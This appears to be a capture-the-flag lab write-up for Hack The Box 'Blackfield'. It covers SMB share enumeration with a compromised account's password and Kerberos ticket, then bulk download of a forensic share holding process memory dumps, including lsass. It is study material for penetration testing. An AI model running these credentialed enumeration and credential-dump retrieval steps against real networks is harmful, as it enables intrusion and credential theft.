SMB
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ smbclient -L //dc01.blackfield.local/
password for [workgroup\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.Upon [[Blackfield_ForceChangePassword#[ForceChangePassword](https //bloodhound.readthedocs.io/en/latest/data-analysis/edges.html forcechangepassword)|compromising]] the audit2020 account, it was easily inferred that the account likely had a connection to the \\dc01.blackfield.local\forensic share, as indicated by the username.
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=audit2020@dc01.blackfield.local.ccache crackmapexec smb dc01.blackfield.local --use-kcache -k --kdcHost dc01.blackfield.local --shares
smb dc01.blackfield.local 445 dc01 [*] windows 10.0 build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB dc01.blackfield.local 445 DC01 [+] BLACKFIELD.local\ from ccache
SMB dc01.blackfield.local 445 DC01 [+] Enumerated shares
SMB dc01.blackfield.local 445 DC01 Share Permissions Remark
SMB dc01.blackfield.local 445 DC01 ----- ----------- ------
SMB dc01.blackfield.local 445 DC01 ADMIN$ Remote Admin
SMB dc01.blackfield.local 445 DC01 C$ Default share
SMB dc01.blackfield.local 445 DC01 forensic READ Forensic / Audit share.
SMB dc01.blackfield.local 445 DC01 IPC$ READ Remote IPC
SMB dc01.blackfield.local 445 DC01 NETLOGON READ Logon server share
SMB dc01.blackfield.local 445 DC01 profiles$ READ
SMB dc01.blackfield.local 445 DC01 SYSVOL READ Logon server share Checking the permissions with crackmapexec, indeed reveals that the audit2020 account has read access to the \\dc01.blackfield.local\forensic share
\\dc01.blackfield.local\forensic
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=audit2020@dc01.blackfield.local.ccache impacket-smbclient BLACKFIELD.LOCAL/@dc01.blackfield.local -k -no-pass -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use forensic
# ls
drw-rw-rw- 0 Sun Feb 23 16:10:16 2020 .
drw-rw-rw- 0 Sun Feb 23 16:10:16 2020 ..
drw-rw-rw- 0 Sun Feb 23 19:14:37 2020 commands_output
drw-rw-rw- 0 Thu May 28 22:29:24 2020 memory_analysis
drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 toolsThere are 3 sub-directories within the \\dc01.blackfield.local\forensic share
\\dc01.blackfield.local\forensic\commands_output
# ls
drw-rw-rw- 0 sun feb 23 19:14:37 2020 .
drw-rw-rw- 0 sun feb 23 19:14:37 2020 ..
-rw-rw-rw- 528 sun feb 23 19:12:54 2020 domain_admins.txt
-rw-rw-rw- 962 sun feb 23 19:12:54 2020 domain_groups.txt
-rw-rw-rw- 16454 fri feb 28 23:32:17 2020 domain_users.txt
-rw-rw-rw- 518202 sun feb 23 19:12:54 2020 firewall_rules.txt
-rw-rw-rw- 1782 sun feb 23 19:12:54 2020 ipconfig.txt
-rw-rw-rw- 3842 sun feb 23 19:12:54 2020 netstat.txt
-rw-rw-rw- 3976 sun feb 23 19:12:54 2020 route.txt
-rw-rw-rw- 4550 sun feb 23 19:12:54 2020 systeminfo.txt
-rw-rw-rw- 9990 sun feb 23 19:12:54 2020 tasklist.txtThe commands_output directory contains some text files that seem to resemble common enumeration techniques
┌──(kali㉿kali)-[~/…/blackfield/smb/forensic/commands_output]
└─$ smbget --recursive smb://dc01.blackfield.local/forensic/commands_output -U 'BLACKFIELD/audit2020%Qwer1234'
using domain: BLACKFIELD, user: audit2020
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/domain_admins.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/domain_groups.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/domain_users.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/firewall_rules.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/ipconfig.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/netstat.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/route.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/systeminfo.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/tasklist.txt
Downloaded 547.15kB in 2 secondsDownloading them to Kali
domain_admins.txt
# cat domain_admins.txt
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.This appears to be an output of NET GROUPS /DOMAIN "Domain Admins"
There is an unfamiliar user; Ipwn3dYourCompany
domain_groups.txt
# cat domain_groups.txt
Group Accounts for \\DC01
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.This appears to be an output of NET GROUPS /DOMAIN
Interestingly, the hostname matches the target’s hostname
There is a possibility that all these are output logs of an active adversary on the target system
domain_users.txt
# cat domain_users.txt
User accounts for \\DC01
-------------------------------------------------------------------------------
Administrator audit2020 BLACKFIELD103974
BLACKFIELD106360 BLACKFIELD107197 BLACKFIELD112766
BLACKFIELD114762 BLACKFIELD115148 BLACKFIELD118321
BLACKFIELD128775 BLACKFIELD129328 BLACKFIELD129387
BLACKFIELD131771 BLACKFIELD135403 BLACKFIELD135990
BLACKFIELD136203 BLACKFIELD136813 BLACKFIELD137694
BLACKFIELD146200 BLACKFIELD148067 BLACKFIELD150357
BLACKFIELD160610 BLACKFIELD160820 BLACKFIELD163183
BLACKFIELD169035 BLACKFIELD169876 BLACKFIELD171624
BLACKFIELD175204 BLACKFIELD184482 BLACKFIELD184493
BLACKFIELD186980 BLACKFIELD189208 BLACKFIELD191416
BLACKFIELD192642 BLACKFIELD194732 BLACKFIELD195757
BLACKFIELD195953 BLACKFIELD196444 BLACKFIELD198927
BLACKFIELD199889 BLACKFIELD201655 BLACKFIELD202900
BLACKFIELD204805 BLACKFIELD219324 BLACKFIELD219914
BLACKFIELD220786 BLACKFIELD224839 BLACKFIELD227380
BLACKFIELD228442 BLACKFIELD229506 BLACKFIELD230515
BLACKFIELD235930 BLACKFIELD236467 BLACKFIELD246388
BLACKFIELD247450 BLACKFIELD250576 BLACKFIELD251003
BLACKFIELD251977 BLACKFIELD252379 BLACKFIELD253047
BLACKFIELD253541 BLACKFIELD256791 BLACKFIELD266096
BLACKFIELD267457 BLACKFIELD268320 BLACKFIELD269538
BLACKFIELD274109 BLACKFIELD274367 BLACKFIELD274577
BLACKFIELD286615 BLACKFIELD289513 BLACKFIELD290325
BLACKFIELD290582 BLACKFIELD291678 BLACKFIELD307633
BLACKFIELD314351 BLACKFIELD315276 BLACKFIELD316850
BLACKFIELD318077 BLACKFIELD318250 BLACKFIELD319016
BLACKFIELD321206 BLACKFIELD327610 BLACKFIELD328983
BLACKFIELD329802 BLACKFIELD334058 BLACKFIELD336573
BLACKFIELD339143 BLACKFIELD348433 BLACKFIELD348835
BLACKFIELD350809 BLACKFIELD356727 BLACKFIELD357023
BLACKFIELD358090 BLACKFIELD359278 BLACKFIELD362337
BLACKFIELD371669 BLACKFIELD375924 BLACKFIELD382769
BLACKFIELD383108 BLACKFIELD385719 BLACKFIELD385928
BLACKFIELD390179 BLACKFIELD390192 BLACKFIELD395725
BLACKFIELD397679 BLACKFIELD402639 BLACKFIELD404213
BLACKFIELD404458 BLACKFIELD405242 BLACKFIELD410243
BLACKFIELD411132 BLACKFIELD411740 BLACKFIELD412798
BLACKFIELD413242 BLACKFIELD415829 BLACKFIELD416532
BLACKFIELD419600 BLACKFIELD428532 BLACKFIELD429587
BLACKFIELD430864 BLACKFIELD433476 BLACKFIELD434395
BLACKFIELD438814 BLACKFIELD438923 BLACKFIELD441593
BLACKFIELD441759 BLACKFIELD446463 BLACKFIELD448641
BLACKFIELD454313 BLACKFIELD460131 BLACKFIELD464763
BLACKFIELD465267 BLACKFIELD468839 BLACKFIELD478410
BLACKFIELD478828 BLACKFIELD484290 BLACKFIELD488531
BLACKFIELD496547 BLACKFIELD497216 BLACKFIELD500073
BLACKFIELD512331 BLACKFIELD518316 BLACKFIELD520852
BLACKFIELD522135 BLACKFIELD532412 BLACKFIELD533060
BLACKFIELD533551 BLACKFIELD533886 BLACKFIELD534196
BLACKFIELD534956 BLACKFIELD538365 BLACKFIELD541148
BLACKFIELD544934 BLACKFIELD546640 BLACKFIELD548394
BLACKFIELD548464 BLACKFIELD549571 BLACKFIELD553715
BLACKFIELD558867 BLACKFIELD561870 BLACKFIELD566117
BLACKFIELD569313 BLACKFIELD569653 BLACKFIELD573498
BLACKFIELD576233 BLACKFIELD579344 BLACKFIELD579980
BLACKFIELD584113 BLACKFIELD586592 BLACKFIELD586934
BLACKFIELD591846 BLACKFIELD592556 BLACKFIELD594619
BLACKFIELD600999 BLACKFIELD601590 BLACKFIELD602567
BLACKFIELD606328 BLACKFIELD606964 BLACKFIELD607290
BLACKFIELD608914 BLACKFIELD609423 BLACKFIELD611993
BLACKFIELD613771 BLACKFIELD616527 BLACKFIELD617630
BLACKFIELD618519 BLACKFIELD622501 BLACKFIELD623122
BLACKFIELD624385 BLACKFIELD631162 BLACKFIELD631599
BLACKFIELD632329 BLACKFIELD634593 BLACKFIELD635996
BLACKFIELD639103 BLACKFIELD644281 BLACKFIELD651599
BLACKFIELD652779 BLACKFIELD653097 BLACKFIELD657263
BLACKFIELD665997 BLACKFIELD673073 BLACKFIELD676303
BLACKFIELD680939 BLACKFIELD682842 BLACKFIELD682949
BLACKFIELD683323 BLACKFIELD684814 BLACKFIELD686428
BLACKFIELD690642 BLACKFIELD691480 BLACKFIELD694429
BLACKFIELD695166 BLACKFIELD697473 BLACKFIELD701303
BLACKFIELD704154 BLACKFIELD706381 BLACKFIELD710285
BLACKFIELD713470 BLACKFIELD717683 BLACKFIELD724669
BLACKFIELD727512 BLACKFIELD732035 BLACKFIELD739227
BLACKFIELD739659 BLACKFIELD739765 BLACKFIELD744790
BLACKFIELD753480 BLACKFIELD753537 BLACKFIELD758945
BLACKFIELD759042 BLACKFIELD759079 BLACKFIELD763893
BLACKFIELD764430 BLACKFIELD765350 BLACKFIELD765982
BLACKFIELD767498 BLACKFIELD767820 BLACKFIELD768095
BLACKFIELD773118 BLACKFIELD773423 BLACKFIELD774376
BLACKFIELD775126 BLACKFIELD775986 BLACKFIELD781404
BLACKFIELD787464 BLACKFIELD787995 BLACKFIELD788523
BLACKFIELD789969 BLACKFIELD792484 BLACKFIELD793029
BLACKFIELD796301 BLACKFIELD802251 BLACKFIELD802875
BLACKFIELD813266 BLACKFIELD818863 BLACKFIELD819822
BLACKFIELD820995 BLACKFIELD826622 BLACKFIELD827906
BLACKFIELD828826 BLACKFIELD835725 BLACKFIELD837541
BLACKFIELD838710 BLACKFIELD839613 BLACKFIELD840481
BLACKFIELD842438 BLACKFIELD842593 BLACKFIELD843883
BLACKFIELD848660 BLACKFIELD859776 BLACKFIELD868068
BLACKFIELD869335 BLACKFIELD871753 BLACKFIELD875008
BLACKFIELD876916 BLACKFIELD877328 BLACKFIELD883784
BLACKFIELD884808 BLACKFIELD894905 BLACKFIELD895235
BLACKFIELD896715 BLACKFIELD898237 BLACKFIELD899238
BLACKFIELD899433 BLACKFIELD907614 BLACKFIELD908329
BLACKFIELD909590 BLACKFIELD911926 BLACKFIELD926559
BLACKFIELD932709 BLACKFIELD933887 BLACKFIELD937395
BLACKFIELD939200 BLACKFIELD939243 BLACKFIELD946435
BLACKFIELD946509 BLACKFIELD962495 BLACKFIELD962999
BLACKFIELD969352 BLACKFIELD971417 BLACKFIELD978938
BLACKFIELD990638 BLACKFIELD991588 BLACKFIELD994577
BLACKFIELD995218 BLACKFIELD996878 BLACKFIELD997545
BLACKFIELD998321 Guest Ipwn3dYouCompany
krbtgt lydericlefebvre support
The command completed successfully.While this appears to be an output of NET USERS /DOMAIN, it confirms my earlier hypothesis.
This was done in the target system; dc01.blackfield.local
firewall_rules.txt
# cat firewall_rules.txt
[...REDACTED...]It’s redacted due to an enormous amount of data, yet nothing special
ipconfig.txt
# cat ipconfig.txt
Windows IP Configuration
Host Name . . . . . . . . . . . . : DC01
Primary Dns Suffix . . . . . . . : BLACKFIELD.local
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : BLACKFIELD.local
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter
Physical Address. . . . . . . . . : 08-00-27-F3-DC-8D
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 192.168.86.156(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.86.1
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : DisabledThe output is from ipconfig command, and it shows an unfamiliar IPv4 address; 192.168.86.156
The DC host might have gone through some changes
netstat.txt
# cat netstat.txt
Active Connections
Proto Local Address Foreign Address State
tcp 127.0.0.1:389 DC01:49679 ESTABLISHED
tcp 127.0.0.1:389 DC01:49681 ESTABLISHED
tcp 127.0.0.1:389 DC01:49698 ESTABLISHED
tcp 127.0.0.1:389 DC01:51060 ESTABLISHED
tcp 127.0.0.1:389 DC01:51125 ESTABLISHED
tcp 127.0.0.1:49679 DC01:ldap ESTABLISHED
tcp 127.0.0.1:49681 DC01:ldap ESTABLISHED
tcp 127.0.0.1:49698 DC01:ldap ESTABLISHED
tcp 127.0.0.1:51060 DC01:ldap ESTABLISHED
tcp 127.0.0.1:51125 DC01:ldap ESTABLISHED
tcp 192.168.86.156:389 DC01:51016 ESTABLISHED
tcp 192.168.86.156:389 DC01:60961 ESTABLISHED
tcp 192.168.86.156:389 DC01:60987 ESTABLISHED
tcp 192.168.86.156:389 DC01:60993 ESTABLISHED
tcp 192.168.86.156:51016 DC01:ldap ESTABLISHED
tcp 192.168.86.156:60961 DC01:ldap ESTABLISHED
tcp 192.168.86.156:60987 DC01:ldap ESTABLISHED
tcp 192.168.86.156:60993 DC01:ldap ESTABLISHED
tcp 192.168.86.156:63810 40.67.251.132:https ESTABLISHED
tcp 192.168.86.156:63830 40.67.251.132:https ESTABLISHED
tcp [::1]:49667 DC01:60989 ESTABLISHED
tcp [::1]:49667 DC01:63777 ESTABLISHED
tcp [::1]:49667 DC01:63836 ESTABLISHED
tcp [::1]:51178 DC01:epmap TIME_WAIT
tcp [::1]:60989 DC01:49667 ESTABLISHED
tcp [::1]:63777 DC01:49667 ESTABLISHED
tcp [::1]:63836 DC01:49667 ESTABLISHEDNothing special here
route.txt
# cat route.txt
===========================================================================
Interface List
3...08 00 27 f3 dc 8d ......Intel(R) PRO/1000 MT Desktop Adapter
1...........................Software Loopback Interface 1
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.86.1 192.168.86.156 281
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
192.168.86.0 255.255.255.0 On-link 192.168.86.156 281
192.168.86.156 255.255.255.255 On-link 192.168.86.156 281
192.168.86.255 255.255.255.255 On-link 192.168.86.156 281
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 192.168.86.156 281
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 192.168.86.156 281
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 192.168.86.1 Default
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
1 331 ::1/128 On-link
1 331 ff00::/8 On-link
===========================================================================
Persistent Routes:
NoneWhile this is a result of route print command, there’s nothing special
systeminfo.txt
# cat systeminfo.txt
host name: DC01
os name: Microsoft Windows Server 2019 Standard Evaluation
os version: 10.0.17763 N/A Build 17763
os manufacturer: Microsoft Corporation
os configuration: Primary Domain Controller
os build type: Multiprocessor Free
registered owner: Windows User
registered organization:
product id: 00431-10000-00000-AA435
original install date: 2/1/2020, 11:04:40 AM
system boot time: 2/23/2020, 3:13:56 AM
system manufacturer: innotek GmbH
system model: VirtualBox
system type: x64-based PC
processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 10 GenuineIntel ~1801 Mhz
bios version: innotek GmbH VirtualBox, 12/1/2006
windows directory: C:\Windows
system directory: C:\Windows\system32
boot device: \Device\HarddiskVolume1
system locale: en-us;English (United States)
input locale: fr;French (France)
time zone: (UTC-08:00) Pacific Time (US & Canada)
total physical memory: 2,048 MB
available physical memory: 901 MB
virtual memory: Max Size: 5,283 MB
virtual memory: Available: 2,891 MB
virtual memory: In Use: 2,392 MB
page file location(s): C:\pagefile.sys
domain: BLACKFIELD.local
logon server: \\DC01
hotfix(s): 3 Hotfix(s) Installed.
[01]: KB4514366
[02]: KB4512577
[03]: KB4512578
network card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Desktop Adapter
connection name: Ethernet
dhcp enabled: No
IP address(es)
[01]: 192.168.86.156
hyper-v requirements: VM Monitor Mode Extensions: No
virtualization enabled in firmware: No
second level address translation: No
data execution prevention available: YesNow this is rather interesting as more sensitive information is exposed While the DC host might have gone through some changes as suspected earlier, It’s nice to have the system information available;
Microsoft Windows Server 2019 Standard Evaluation10.0.17763 N/A Build 17763x64-based1 Processor(s)3 Hotfix(s)[01]: KB4514366[02]: KB4512577[03]: KB4512578
fr;French (France)
tasklist.txt
# cat tasklist.txt
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 8 K
System 4 Services 0 144 K
Registry 68 Services 0 60,316 K
smss.exe 244 Services 0 8 K
csrss.exe 340 Services 0 456 K
csrss.exe 412 Console 1 1,420 K
wininit.exe 420 Services 0 12 K
winlogon.exe 468 Console 1 1,160 K
services.exe 532 Services 0 4,348 K
lsass.exe 540 Services 0 39,144 K
svchost.exe 724 Services 0 7,772 K
svchost.exe 756 Services 0 6,688 K
dwm.exe 848 Console 1 41,360 K
svchost.exe 920 Services 0 3,248 K
svchost.exe 928 Services 0 27,548 K
svchost.exe 948 Services 0 5,392 K
svchost.exe 968 Services 0 432 K
svchost.exe 996 Services 0 4,704 K
svchost.exe 1012 Services 0 12,196 K
svchost.exe 332 Services 0 8,136 K
svchost.exe 1036 Services 0 4,632 K
svchost.exe 1220 Services 0 156 K
svchost.exe 1272 Services 0 1,300 K
svchost.exe 1800 Services 0 1,084 K
svchost.exe 1952 Services 0 3,108 K
fontdrvhost.exe 2036 Console 1 1,528 K
fontdrvhost.exe 2044 Services 0 16 K
spoolsv.exe 876 Services 0 16 K
svchost.exe 836 Services 0 2,860 K
Microsoft.ActiveDirectory 1412 Services 0 30,740 K
svchost.exe 1600 Services 0 12,300 K
dfsrs.exe 1708 Services 0 9,652 K
dns.exe 1796 Services 0 4,576 K
ismserv.exe 1496 Services 0 1,576 K
dfssvc.exe 568 Services 0 2,008 K
MsMpEng.exe 2076 Services 0 55,692 K
wlms.exe 2088 Services 0 1,532 K
msdtc.exe 1676 Services 0 16 K
svchost.exe 1868 Services 0 3,428 K
svchost.exe 2480 Services 0 6,136 K
sihost.exe 3464 Console 1 3,592 K
svchost.exe 3472 Console 1 2,328 K
taskhostw.exe 3548 Console 1 3,916 K
ctfmon.exe 3756 Console 1 4,540 K
explorer.exe 3936 Console 1 33,528 K
ShellExperienceHost.exe 3688 Console 1 16 K
SearchUI.exe 3156 Console 1 16 K
RuntimeBroker.exe 4184 Console 1 264 K
RuntimeBroker.exe 4256 Console 1 4,856 K
ServerManager.exe 4332 Console 1 63,888 K
RuntimeBroker.exe 4616 Console 1 556 K
smartscreen.exe 4780 Console 1 1,888 K
dllhost.exe 892 Console 1 1,560 K
NisSrv.exe 2692 Services 0 1,240 K
powershell.exe 1988 Console 1 2,092 K
conhost.exe 4284 Console 1 2,104 K
taskhostw.exe 5064 Console 1 2,872 K
mmc.exe 2456 Console 1 23,536 K
powershell.exe 1732 Console 1 115,336 K
conhost.exe 4432 Console 1 8,072 K
WmiPrvSE.exe 3404 Services 0 15,288 K
tasklist.exe 3092 Console 1 7,464 KAV is up and running; NisSrv.exe, smartscreen.exe
spooler is also running; spoolsv.exe
\\dc01.blackfield.local\forensic\memory_analysis
# cd memory_analysis
# ls
drw-rw-rw- 0 thu may 28 22:29:24 2020 .
drw-rw-rw- 0 thu may 28 22:29:24 2020 ..
-rw-rw-rw- 37876530 thu may 28 22:29:24 2020 conhost.zip
-rw-rw-rw- 24962333 thu may 28 22:29:24 2020 ctfmon.zip
-rw-rw-rw- 23993305 thu may 28 22:29:24 2020 dfsrs.zip
-rw-rw-rw- 18366396 thu may 28 22:29:24 2020 dllhost.zip
-rw-rw-rw- 8810157 thu may 28 22:29:24 2020 ismserv.zip
-rw-rw-rw- 41936098 thu may 28 22:29:24 2020 lsass.zip
-rw-rw-rw- 64288607 thu may 28 22:29:24 2020 mmc.zip
-rw-rw-rw- 13332174 thu may 28 22:29:24 2020 RuntimeBroker.zip
-rw-rw-rw- 131983313 thu may 28 22:29:24 2020 ServerManager.zip
-rw-rw-rw- 33141744 thu may 28 22:29:24 2020 sihost.zip
-rw-rw-rw- 33756344 thu may 28 22:29:24 2020 smartscreen.zip
-rw-rw-rw- 14408833 thu may 28 22:29:24 2020 svchost.zip
-rw-rw-rw- 34631412 thu may 28 22:29:24 2020 taskhostw.zip
-rw-rw-rw- 14255089 thu may 28 22:29:24 2020 winlogon.zip
-rw-rw-rw- 4067425 thu may 28 22:29:24 2020 wlms.zip
-rw-rw-rw- 18303252 thu may 28 22:29:24 2020 WmiPrvSE.zipThe memory_analysis directory contains 16 archive files
Judging by the name of the parent directory and the share, these archive files likely contain memory dump
┌──(kali㉿kali)-[~/…/blackfield/smb/forensic/memory_analysis]
└─$ smbget --recursive smb://dc01.blackfield.local/forensic/memory_analysis -U 'BLACKFIELD/audit2020%Qwer1234'
using domain: BLACKFIELD, user: audit2020
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/conhost.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/ctfmon.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/dfsrs.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/dllhost.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/ismserv.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/lsass.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/mmc.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/RuntimeBroker.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/ServerManager.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/sihost.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/smartscreen.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/svchost.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/taskhostw.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/winlogon.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/wlms.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/WmiPrvSE.zip
Downloaded 494.11MB in 259 secondsDownloading them to Kali
┌──(kali㉿kali)-[~/…/blackfield/smb/forensic/memory_analysis]
└─$ unzip \*.zip
archive: taskhostw.zip
inflating: taskhostw.DMP
archive: dllhost.zip
inflating: dllhost.DMP
archive: lsass.zip
inflating: lsass.DMP
archive: conhost.zip
inflating: conhost.DMP
archive: RuntimeBroker.zip
inflating: RuntimeBroker.DMP
archive: ismserv.zip
inflating: ismserv.DMP
archive: WmiPrvSE.zip
inflating: WmiPrvSE.DMP
archive: smartscreen.zip
inflating: smartscreen.DMP
archive: ServerManager.zip
inflating: ServerManager.DMP
archive: winlogon.zip
inflating: winlogon.DMP
archive: mmc.zip
inflating: mmc.DMP
archive: svchost.zip
inflating: svchost.DMP
archive: sihost.zip
inflating: sihost.DMP
archive: wlms.zip
inflating: wlms.DMP
archive: dfsrs.zip
inflating: dfsrs.DMP
archive: ctfmon.zip
inflating: ctfmon.DMP
16 archives were successfully processed.Extracting archives As expected, those 16 archives contains memory dump Static analysis will take place in a dedicated page
\\dc01.blackfield.local\forensic\tools
# cd tools
# ls
drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 .
drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 ..
drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 sleuthkit-4.8.0-win32
drw-rw-rw- 0 Fri Feb 28 23:30:35 2020 sysinternals
drw-rw-rw- 0 Fri Feb 28 23:30:35 2020 volatilityThe tools directory contains 3 tools that would commonly be used for forensics
While there is nothing special to them as those directories just contain the tools themselves, the presence may imply that forensics is needed